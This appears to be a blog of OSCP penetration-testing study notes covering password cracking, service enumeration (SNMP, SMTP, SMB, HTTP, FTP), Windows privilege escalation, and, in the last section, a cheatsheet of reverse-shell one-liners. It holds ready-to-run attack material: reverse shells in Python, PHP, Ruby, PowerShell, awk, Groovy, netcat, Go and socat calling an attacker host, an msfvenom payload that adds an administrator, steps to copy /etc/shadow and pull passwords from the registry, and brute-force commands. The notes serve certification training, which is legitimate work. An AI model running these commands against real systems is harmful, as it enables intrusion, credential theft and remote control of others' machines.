
Friday, 18 October 2019

OSCP- Password Cracking

John The Ripper

To crack Linux system passwords using john and rockyou.txt:

First, copy /etc/passwd and /etc/shadow from the victim machine (shadow is readable only by root, so this needs a root shell or a file-read vulnerability).

unshadow passwd shadow > unshadowed
john unshadowed --wordlist=~/Downloads/rockyou.txt

Cracked passwords are saved in ~/.john/john.pot; running the same command again only reports "No password hashes left to crack", so use john --show unshadowed to print them again.
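What the unshadow step actually does, and how to tell up front which hash scheme (and therefore which john --format) a shadow file contains, as an added POSIX sh example that is not part of the original post. The passwd and shadow contents are constructed for the demo, and the hash bodies are placeholders of the right shape, not real crypt(3) output.

```shell
#!/bin/sh
# Added example: reimplements the unshadow merge in awk and labels hash schemes.
# SAMPLE_PASSWD / SAMPLE_SHADOW are constructed; hashes are placeholders.

SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:alice:/home/alice:/bin/bash
bob:x:1001:1001:bob:/home/bob:/bin/bash'

SAMPLE_SHADOW='root:$6$saltsalt$placeholderhashroot:18000:0:99999:7:::
daemon:*:18000:0:99999:7:::
alice:$1$abcdefgh$placeholderhashalice:18000:0:99999:7:::
bob:!:18000:0:99999:7:::'

# unshadow_sh PASSWD SHADOW: emit each passwd line with field 2 replaced by the
# user's shadow hash, the way unshadow(8) does. Accounts whose shadow field is
# empty or starts with ! or * are locked/passwordless and are dropped, since
# john would skip them anyway.
unshadow_sh() {
  awk -F: -v OFS=: '
    NR == FNR { hash[$1] = $2; next }     # first file (shadow): user -> hash
    ($1 in hash) {
      h = hash[$1]
      if (h == "" || h ~ /^[!*]/) next
      $2 = h
      print
    }' "$2" "$1"
}

# hash_scheme HASH: name the crypt(3) scheme from the "$id$" prefix. The names
# match john jumbo's --format values (yescrypt has to go through --format=crypt).
hash_scheme() {
  case "$1" in
    '$1$'*)         echo md5crypt ;;
    '$5$'*)         echo sha256crypt ;;
    '$6$'*)         echo sha512crypt ;;
    '$y$'*|'$7$'*)  echo yescrypt ;;
    '$2'[aby]'$'*)  echo bcrypt ;;
    *)              echo unknown ;;
  esac
}

# unshadow_report PASSWD SHADOW: "user scheme" per crackable account, so you
# can see whether a single --format covers the whole file.
unshadow_report() {
  unshadow_sh "$1" "$2" | while IFS=: read -r user hash rest; do
    printf '%s %s\n' "$user" "$(hash_scheme "$hash")"
  done
}

# Demo on the constructed files (temporary copies, removed afterwards).
demo_unshadow() {
  p=$(mktemp) s=$(mktemp)
  printf '%s\n' "$SAMPLE_PASSWD" > "$p"
  printf '%s\n' "$SAMPLE_SHADOW" > "$s"
  unshadow_report "$p" "$s"
  rm -f "$p" "$s"
}
demo_unshadow
```

On the constructed data only root (sha512crypt) and alice (md5crypt) survive the merge; daemon and bob are locked. A mixed file like this is why john sometimes reports "Using default input encoding" and then loads only one hash type: force each type with --format and run the wordlist twice.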

Hydra

To crack SSH

hydra -L <username_list.txt> -P <password_list.txt> <ip> ssh -s 22 -t 10

(hydra warns that many SSH servers drop connections above 4 parallel tasks; lower -t if you see connection errors.)

To crack web application logins
hydra -l <username> -P <password list> <target hostname> <service module> "<path>:<POST body with ^USER^ and ^PASS^>:<failure string>"
hydra -l admin -P /usr/share/wordlists/rockyou.txt www.vulnwebsite.com http-post-form "/Login.asp:UserName=^USER^&UserPass=^PASS^:F=Login Failed" -vV -f

The third field of the http-post-form string is the text hydra looks for in a failed login (F=, the default). Use S=<string> only when you have a success string instead; giving the failure text with S= makes hydra report every wrong password as a hit. -f stops at the first valid pair, -vV prints each attempt.

Medusa

medusa -h <ip> -u guest -P passwords.txt -M ftp

Ncrack


ncrack -vv --user admin -P passwords rdp://<ip>


Thursday, 17 October 2019

OSCP- Enumeration SNMP

SNMP - Simple Network Management Protocol - UDP port 161 (traps go to UDP 162)

Enumeration:

1) nc -nvu <victim_ip> 161   (SNMP runs over UDP, so nc needs -u; telnet is TCP-only and cannot reach the service)

2) nmap

nmap -sU -p 161 --script snmp-info,snmp-brute,snmp-interfaces,snmp-processes,snmp-win32-users,snmp-win32-software,snmp-win32-shares,snmp-win32-services <victim_ip>

3) snmpwalk

snmpwalk -c public -v1 <victim_ip>   # community string and SNMP version; try -v2c as well (v1 and v2c have no authentication beyond the community string)

MIB - Management Information Base OIDs; append one to the snmpwalk command to walk just that subtree

1.3.6.1.2.1.25.1.6.0 System Processes
1.3.6.1.2.1.25.4.2.1.2 Running Programs
1.3.6.1.2.1.25.4.2.1.4 Processes Path
1.3.6.1.2.1.25.2.3.1.4 Storage Units
1.3.6.1.2.1.25.6.3.1.2 Software Name
1.3.6.1.4.1.77.1.2.25 User Accounts
1.3.6.1.2.1.6.13.1.3 TCP Local Ports

4) snmp-check

snmp-check -t 192.168.1.101 -c public

5) onesixtyone (fast community-string brute force)

onesixtyone -c <community file name to try> <victim_ip>
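What nc -u actually has to send to port 161 before an agent answers, as an added POSIX sh example that is not from the original post: it builds an SNMPv1 GetRequest by hand, including the BER encoding of the OID (first two arcs packed into one byte, later arcs in base 128). It requests sysDescr (1.3.6.1.2.1.1.1.0) with community public; the request-id is fixed at 1 and every length is assumed to fit BER's one-byte short form (under 128 bytes), both choices of this example.

```shell
#!/bin/sh
# Added example: build an SNMPv1 GetRequest so the bytes sent to UDP/161 are
# not a mystery. Assumptions: request-id 1, all BER lengths < 128 (short form).

hx() { printf '%02x' "$1"; }                               # decimal -> two hex digits
hex_count() { set -- $1; echo $#; }                         # number of bytes in a hex string
hex_str() { printf '%s' "$1" | od -An -v -tx1 | xargs; }    # ASCII -> space-separated hex

# ber_oid_hex DOTTED: content octets of an OBJECT IDENTIFIER. The first two
# arcs pack into one byte (40*a + b); every later arc is base-128, most
# significant group first, with bit 7 set on all groups but the last.
ber_oid_hex() {
  set -- $(printf '%s' "$1" | tr '.' ' ')
  out=$(hx $(($1 * 40 + $2)))
  shift 2
  for n in "$@"; do
    if [ "$n" -lt 128 ]; then
      out="$out $(hx "$n")"
    else
      groups=""
      while [ "$n" -gt 0 ]; do
        groups="$((n % 128)) $groups"
        n=$((n / 128))
      done
      set -- $groups
      while [ $# -gt 1 ]; do out="$out $(hx $(($1 + 128)))"; shift; done
      out="$out $(hx "$1")"
    fi
  done
  printf '%s\n' "$out"
}

# ber_wrap TAG HEX: prepend tag and short-form length to content octets.
ber_wrap() {
  len=$(hex_count "$2")
  [ "$len" -lt 128 ] || { echo "ber_wrap: content too long for short form" >&2; return 1; }
  printf '%s %s %s\n' "$1" "$(hx "$len")" "$2"
}

# snmp_v1_get_hex COMMUNITY OID: the whole message as space-separated hex.
#   Message ::= SEQUENCE { version INTEGER(0), community OCTET STRING, GetRequest-PDU }
#   GetRequest-PDU ::= [0] { request-id, error-status, error-index, VarBindList }
snmp_v1_get_hex() {
  community=$(ber_wrap 04 "$(hex_str "$1")")
  oid=$(ber_wrap 06 "$(ber_oid_hex "$2")")
  varbind=$(ber_wrap 30 "$oid 05 00")                              # { name, value NULL }
  varbindlist=$(ber_wrap 30 "$varbind")
  pdu=$(ber_wrap a0 "02 01 01 02 01 00 02 01 00 $varbindlist")    # id 1, status 0, index 0
  ber_wrap 30 "02 01 00 $community $pdu"                           # version 0 = SNMPv1
}

# Demo: sysDescr with the default community (40 bytes on the wire).
snmp_v1_get_hex public 1.3.6.1.2.1.1.1.0
```

Pipe the output through xxd -r -p | nc -u -w 2 <victim_ip> 161 | xxd: an agent that accepts the community replies with a GetResponse (tag a2) carrying the sysDescr string, which is the same value snmpwalk prints first. Silence until the timeout usually means a wrong community string, because v1/v2c agents drop those requests without answering, which is exactly why onesixtyone has to brute-force them.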


Exploitation:


use "exploit-db.com" to find the latest exploits for snmp

Friday, 11 October 2019

OSCP- Enumeration SMTP

SMTP - Simple Mail Transfer Protocol- Port 25

Possible SMTP commands

HELO - Identifies the client to the server (the original SMTP greeting).
EHLO - Extended SMTP greeting; the server answers with the extensions it supports.
STARTTLS - SMTP runs over an unencrypted channel; starting a TLS session encrypts the traffic.
RCPT - Address of the recipient.
DATA - Starts the transfer of the message contents.
RSET - Used to abort the current email transaction.
MAIL - Specifies the email address of the sender.
QUIT - Closes the connection.
HELP - Asks for the help screen.
AUTH - Used to authenticate the client to the server.
VRFY - Asks the server to verify whether the user's mailbox exists.
EXPN - Asks the server to expand a mailing list or alias into its members.

Enumeration:

1) nc -nv <ip> 25

    VRFY <username>    (250 = mailbox exists, 550 = unknown user; 252 means the server will not say, so try EXPN or RCPT TO instead)

2) nmap


nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 10.0.0.1


3) telnet <ip> 25

4) smtp-user-enum


smtp-user-enum -M VRFY -U /root/sectools/SecLists/Usernames/Names/names.txt -t <victim_ip>

5) iSMTP


ismtp -h <victim_ip>:25 -e /root/Downloads/email.txt
6) Metasploit


use auxiliary/scanner/smtp/smtp_enum 
msf auxiliary(smtp_enum) > set rhosts <victim_ip>
msf auxiliary(smtp_enum) > set rport 25 
msf auxiliary(smtp_enum) > set USER_FILE /root/Desktop/user.txt 
msf auxiliary(smtp_enum) > exploit
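The VRFY loop that the nc/telnet steps do by hand, scripted in POSIX sh as an added example that is not from the original post: one function writes the client side of the session, the other pairs the server's replies with the users sent and classifies each reply code, including the 252 "cannot VRFY" case that smtp-user-enum would otherwise report as a hit. SMTP_SESSION_SAMPLE is a constructed Postfix-style transcript, not captured traffic, and the HELO name is an assumption.

```shell
#!/bin/sh
# Added example: scripted VRFY enumeration with proper reply handling.
# SMTP_SESSION_SAMPLE is a constructed server transcript for the demo.

# vrfy_status REPLY: classify one VRFY reply line by its code.
#   250/251 mailbox exists (251: will forward), 550/551/553 unknown user,
#   252 "cannot VRFY user, but will accept message" (server refuses to say;
#   fall back to EXPN or RCPT TO), 500/502 command disabled.
vrfy_status() {
  case "$1" in
    250*|251*)        echo valid ;;
    252*)             echo unverifiable ;;
    550*|551*|553*)   echo invalid ;;
    500*|502*)        echo disabled ;;
    *)                echo unknown ;;
  esac
}

# read_reply: consume one SMTP reply from stdin, skipping "NNN-" continuation
# lines (multi-line EHLO answers), and print the final "NNN " line without CR.
read_reply() {
  while IFS= read -r line; do
    line=$(printf '%s' "$line" | tr -d '\r')
    case "$line" in
      ???-*) continue ;;
      *) printf '%s\n' "$line"; return 0 ;;
    esac
  done
  return 1
}

# smtp_vrfy_script USERS_FILE: the client side of the session, CRLF-terminated.
smtp_vrfy_script() {
  printf 'HELO probe.local\r\n'          # hostname is an assumption; any works
  while IFS= read -r u; do
    [ -n "$u" ] && printf 'VRFY %s\r\n' "$u"
  done < "$1"
  printf 'QUIT\r\n'
}

# smtp_vrfy_pair USERS_FILE: pair the server replies on stdin with the users
# sent, in order: banner, HELO reply, then one reply per VRFY. Prints "user status".
smtp_vrfy_pair() {
  read_reply >/dev/null || return 1      # 220 banner
  read_reply >/dev/null || return 1      # HELO reply
  while IFS= read -r u <&3; do
    [ -n "$u" ] || continue
    reply=$(read_reply) || reply=""
    printf '%s %s\n' "$u" "$(vrfy_status "$reply")"
  done 3< "$1"
}

# Constructed transcript of what a server might answer to the script above for
# the users root, nobody, bob (CRLF line endings as on the wire).
SMTP_SESSION_SAMPLE=$(printf '220 mail.example.test ESMTP Postfix\r\n250 mail.example.test\r\n250 2.1.5 root <root@mail.example.test>\r\n550 5.1.1 <nobody>: Recipient address rejected: User unknown\r\n252 2.0.0 bob\r\n221 2.0.0 Bye\r\n')

demo_vrfy() {
  users=$(mktemp)
  printf 'root\nnobody\nbob\n' > "$users"
  printf '%s\n' "$SMTP_SESSION_SAMPLE" | smtp_vrfy_pair "$users"
  rm -f "$users"
}
demo_vrfy
```

Against a live target the two halves go either side of nc: smtp_vrfy_script users.txt | nc -nv <ip> 25 | smtp_vrfy_pair users.txt. The pairing relies on the server answering commands in order, which SMTP guarantees; if every user comes back "unverifiable", VRFY is neutered (Postfix answers 252 for everyone by default) and the RCPT TO method is the one to use.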

Exploitation:

Common Exploits:

https://www.exploit-db.com/exploits/34896
https://www.exploit-db.com/exploits/41672
https://www.exploit-db.com/exploits/23113




Thursday, 10 October 2019

OSCP- Enumeration SMB


SMB - Server Message Block - port 445 (also 139 over NetBIOS)


Enumeration:

Vulnerability scan

nmap -p 445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse 10.10.10.10
Users & Shares scan
nmap -p 445 -vv --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.10.10
Enum4linux
enum4linux -a 10.10.10.10
Null session (anonymous RPC bind; -N skips the password prompt)

rpcclient -U "" -N 10.10.10.10
To connect to SMB

smbclient -L <ip> -N            # list shares
smbclient //<ip>/<share> -N     # connect to a share (add -U <user> for credentials)

Wireshark - Analyze the wireshark packets for SMB version and other information



Exploitation:


1) Default password check while connecting to SMB
admin/admin, administrator/administrator, test/test, user/user, etc.,


2) Common Exploits


MS08-067 (windows) - https://www.exploit-db.com/exploits/40279/
Samba 2.2.7a (Linux) - https://www.exploit-db.com/exploits/10/
EternalBlue (windows) - https://www.exploit-db.com/exploits/42315 




Wednesday, 9 October 2019

OSCP- Enumeration HTTP/HTTPS


HTTP- Hyper Text Transfer Protocol - Port 80
HTTPs- Hyper Text Transfer Protocol secure - Port 443



1) Heartbleed (CVE-2014-0160) and other TLS weaknesses

sudo sslscan 192.168.101.1:443

nmap -sV -p 443 --script=ssl-heartbleed 192.168.101.8


2) nc <ip> <port>

3) nmap -p 80 --script dns-brute,http-backup-finder,http-config-backup,http-rfi-spider,http-brute,http-default-accounts,http-put,http-enum <ip>
   (http-brute and http-default-accounts try logins against the target; http-put only uploads when given the http-put.url and http-put.file script args)

4) nikto -h <ip>

5) dirb http://<ip>
   wordlists:
     /usr/share/wordlists/dirb/common.txt
     /usr/share/wordlists/dirb/big.txt


6) Check for robots.txt (paths the site owner asked crawlers to skip are often the interesting ones):
   curl -i http://<ip>/robots.txt   (or)
   parsero -u http://<ip>
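What parsero does with that robots.txt, as an added POSIX sh example that is not from the original post: it pulls every non-empty Disallow rule out of a robots file, drops comments and duplicates, flags wildcard rules that are patterns rather than single URLs, and joins the rest to a base URL ready for curl or dirb. ROBOTS_SAMPLE is a constructed file and the hostname is an assumption.

```shell
#!/bin/sh
# Added example: robots.txt -> candidate URLs. ROBOTS_SAMPLE is constructed.

ROBOTS_SAMPLE='# constructed sample
User-agent: *
Disallow: /admin/
Disallow: /backup/db.sql.bak
Disallow:            # empty rule: allows everything, nothing to test
Disallow: /private/*.php
Allow: /public/
Sitemap: http://target.example/sitemap.xml

User-agent: Googlebot
Disallow: /tmp/'

# robots_paths: read robots.txt on stdin, print each non-empty Disallow path
# once. Comments and CRs are stripped; rules containing * or $ are kept but
# tagged "(pattern)" because they are not a single URL to fetch.
robots_paths() {
  tr -d '\r' | sed 's/#.*//' | awk '
    tolower($1) == "disallow:" && $2 != "" {
      p = $2
      if (!(p in seen)) {
        seen[p] = 1
        if (p ~ /[*$]/) print p "  (pattern)"; else print p
      }
    }'
}

# robots_urls BASE: the same paths joined to a base URL, patterns dropped.
robots_urls() {
  base=${1%/}
  robots_paths | awk -v base="$base" '$NF != "(pattern)" { print base $1 }'
}

# Demo on the constructed sample.
printf '%s\n' "$ROBOTS_SAMPLE" | robots_urls http://target.example
```

Feed the output to curl -s -o /dev/null -w '%{http_code} %{url_effective}\n' per line, or to dirb as a starting point: a 403 on a Disallowed path still confirms the directory exists, and the pattern rules (here /private/*.php) tell you a file extension worth adding to the dirb wordlist.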


7) Check the source code and comments in the source code for any valuable information.

8) Try default credentials for login/ admin pages
    admin/admin, administrator/administrator,test/test,user/user,user1/user1, etc


9) For WordPress
     wpscan --url http://<ip>/wp/   (older wpscan releases used -u instead of --url)

10) In all Parameters (also headers & cookies), check for SQL, XSS, LFI/ RFI



Monday, 7 October 2019

OSCP- Enumeration FTP


FTP - File Transfer Protocol

Port number - 20 --> Data transfer
              21 --> Control

FTP transfers files between machines in a client-server model: the client connects to the server's control port, and each requested file (download from the server, or upload to it) travels over a separate data connection.


Common FTP servers: ProFTPD, vsftpd, PureFTPd, FileZilla Server, etc.

Connect to a FTP server:

ftp <ip victim>
nc -nv <ip victim> 21   # the banner usually reveals the server software and version



How to exploit an FTP server:


1. Try using default credentials
           anonymous: anonymous   (anonymous FTP accepts any password, by convention an email address)
           admin: admin
           administrator: administrator


2.  Enumeration

      nmap

      nmap -p 21 --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221 <ip>
      nmap -sU -p 69 --script=tftp-enum <ip>    # TFTP is a separate UDP service


3. Finding exploits
           Common exploits for RCE, Directory Traversal, Credential Disclosure, Arbitrary File upload, SQL Injection, and Buffer Overflow.

   search for exploits by the FTP server name and version from the banner
           searchsploit <ftp server name, version>
           https://www.exploit-db.com/



4. Brute Force


medusa -h 10.10.10.10 -u user -P passwords.txt -M ftp 
hydra -s [PORT] -C ./wordlists/ftp-default-userpass.txt -u -f [IP] ftp






Sunday, 6 October 2019

OSCP- Privilege Escalation Windows


1) Kernel Exploits:

Download windows-exploit-suggester and update its database (an Excel sheet of Microsoft security bulletins) with ./windows-exploit-suggester.py --update

Run 'systeminfo' on the victim machine and copy the output to a text file, e.g. sysinfo_victim.txt

./windows-exploit-suggester.py --database latest_database_file_mssb.xlsx --systeminfo sysinfo_victim.txt

2) Search for clear passwords:

In files-

dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b 

dir c:\ /s /b | findstr /si *vnc.ini

c:\sysprep.inf
c:\sysprep\sysprep.xml
c:\unattend.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml


Search for passwords-

--> Find every line containing "password" in every file under the current directory (/s recursive, /p skip binary files, /i case-insensitive, /n line numbers).
findstr /spin "password" *.*

--> Find all those strings in config files.
dir /s *pass* == *cred* == *vnc* == *.config*

findstr /si password *.txt
findstr /si password *.xml

findstr /si password *.ini


In Registry-

—> VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"

—> Windows autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

—> SNMP parameters (community strings)
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"

—> Putty
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"

—> Search for password in registry
reg query HKLM /f password /t REG_SZ /s

reg query HKCU /f password /t REG_SZ /s


3) Always Install Elevated:

To check if AlwaysInstallElevated is enabled (the value must be 1 under both keys)-

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

'The system was unable to find the specified registry key or value' means that AlwaysInstallElevated is not enabled.

If it is enabled, any .msi package is installed with SYSTEM privileges, so generate one with msfvenom and install it with msiexec /quiet /qn /i escalate.msi. The adduser payload below creates a local user and adds it to the Administrators group; for a reverse shell instead, use -p windows/shell_reverse_tcp LHOST=<attacker_ip> LPORT=<port> with the same -f msi.

 msfvenom -p windows/adduser USER=hacker PASS=myPass -f msi -o escalate.msi


4) Unquoted Service Path

To check-

using wmic

wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
(auto-start services outside C:\Windows whose path does not begin with a quote)

using sc

sc query
sc qc <service name>
Look for an unquoted binary path containing spaces, e.g. C:\Program Files\Anti Virus\bin\scanner.exe. Windows resolves such a path by trying C:\Program.exe, then C:\Program Files\Anti.exe, before the real binary, so write access to C:\ or C:\Program Files (check with icacls) lets you plant a binary that runs with the service account, often LocalSystem.

To Exploit-

Generate a reverse shell .exe with msfvenom, name it after the first word of the path segment you can write to (Anti.exe in this example) and save it as "C:\Program Files\Anti.exe".

Now restart the service so it runs the planted binary. sc takes the service name shown by sc query, not the executable name; if you lack permission to stop it, an Auto-start service will run the binary on the next reboot.

sc stop <service name>
sc start <service name>
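The logic behind the wmic one-liner and the path-resolution rule above, as an added POSIX sh example that is not from the original post (written in sh so it can be run offline on the attacker box; on the target the same filters are the findstr chain). It reads the CSV that wmic service get name,pathname,startmode /format:csv prints, keeps auto-start, unquoted, non-Windows-directory paths with a space before the .exe, and for each one lists the files Windows will try in order. WMIC_CSV_SAMPLE is constructed: the service names and paths are made up.

```shell
#!/bin/sh
# Added example: unquoted-service-path detection over a constructed wmic CSV,
# plus the candidate files Windows tries for an unquoted image path.

WMIC_CSV_SAMPLE='
Node,Name,PathName,StartMode
HOST1,Scanner,C:\Program Files\Anti Virus\bin\scanner.exe,Auto
HOST1,Spooler,C:\Windows\System32\spoolsv.exe,Auto
HOST1,VendorSvc,"C:\Program Files\Vendor\svc.exe" -k netsvcs,Auto
HOST1,BuildAgent,C:\Tools\build agent\agent.exe --service,Manual'

# unquoted_service_paths: read the CSV on stdin, print "Name Path" for Auto
# services whose path is unquoted, contains a space before the .exe and is not
# under C:\Windows (the same three filters as the findstr chain). Assumes the
# binary ends in .exe and that no path contains a comma.
unquoted_service_paths() {
  tr -d '\r' | awk -F, '
    NF >= 4 && $4 == "Auto" {
      p = $3
      if (p ~ /^"/) next                          # already quoted
      if (tolower(p) ~ /^c:\\windows\\/) next     # system directory
      exe = p; sub(/\.exe.*/, ".exe", exe)        # drop arguments
      if (exe ~ / /) print $2 " " exe
    }'
}

# hijack_candidates PATH: the files CreateProcess looks for, in order, when
# the image path is unquoted: it cuts at every space and appends .exe. A
# writable directory anywhere on this list lets you plant a binary the
# service will run.
hijack_candidates() {
  exe=${1%%.exe*}.exe
  prefix=""
  set -f; set -- $exe; set +f                     # split on spaces, no globbing
  while [ $# -gt 1 ]; do
    prefix="${prefix:+$prefix }$1"
    printf '%s.exe\n' "$prefix"
    shift
  done
  printf '%s\n' "$exe"
}

# unquoted_report: one block per vulnerable service with its candidate paths.
unquoted_report() {
  unquoted_service_paths | while IFS= read -r line; do
    name=${line%% *}
    path=${line#* }
    printf '[%s]\n' "$name"
    hijack_candidates "$path"
  done
}

printf '%s\n' "$WMIC_CSV_SAMPLE" | unquoted_report
```

On the constructed data only Scanner survives the filters (Spooler lives under C:\Windows, VendorSvc is quoted, BuildAgent is Manual) and the candidates come out as C:\Program.exe, C:\Program Files\Anti.exe, then the real binary. On the target, run icacls on the directory of each candidate and look for (W) or (F) granted to Users, Authenticated Users or Everyone; the first writable one is where the msfvenom binary goes.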

5)Services only available inside the victim machine

To check-

netstat -ano   (look for LISTENING sockets bound to 127.0.0.1 only; -o gives the owning PID, match it with tasklist)

To exploit-

Port forward the service to exploit it

—> Port forward using plink (needs an SSH server on the attacker box; -R makes the victim's 127.0.0.1:8080 reachable on the attacker at localhost:8080)
plink.exe -l attacker_username -pw attacker_pass <attackerip> -R 8080:127.0.0.1:8080

—> Port forward using meterpreter
portfwd add -l <attacker port> -p <victim port> -r <victim ip>
portfwd add -l 3306 -p 3306 -r 192.168.1.101



Saturday, 5 October 2019

OSCP - Non Meterpreter Reverse Shell Cheatsheet



Non-Meterpreter Shells

1. Python:

Linux-
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

Windows-
C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.10.10.10', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, 
__g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"

2. PHP:
php -r '$sock=fsockopen("<attacker_ip>",<port>);exec("/bin/sh -i <&3 >&3 2>&3");'
(assumes the socket lands on file descriptor 3; if nothing comes back, try <&4 >&4 2>&4)


3. Ruby:

Linux-
ruby -rsocket -e'f=TCPSocket.open("<attacker_ip>",<port>).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("<attacker_ip>","<port>");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Windows-
ruby -rsocket -e 'c=TCPSocket.new("<attacker_ip>","<port>");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'


4. Powershell:
(first form hides the window and bypasses the execution policy; second is the minimal version)
powershell -NoP -NonI -W Hidden -Exec Bypass -Command "$client = New-Object System.Net.Sockets.TCPClient('<attacker_ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<attacker_ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"


5. Awk (gawk only: |& is the gawk coprocess operator):
awk 'BEGIN {s = "/inet/tcp/0/<attacker_ip>/<port>"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null


6. Java (Groovy syntax, e.g. for a Jenkins script console):
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/<attacker_ip>/<port>;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()



7. NetCat:
nc -e /bin/sh <attacker_ip> <port>    # only when nc was built with -e (nc.traditional, ncat); the OpenBSD netcat has no -e

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attacker_ip> <port> >/tmp/f    # works with any nc



8. Golang:

echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","<attacker_ip>:<port>");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go


9. SOCAT (fully interactive tty):

Attacker
socat file:`tty`,raw,echo=0 TCP-L:<port>

Victim (socat is rarely installed; upload a static binary to /tmp first)
/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<attacker_ip>:<port>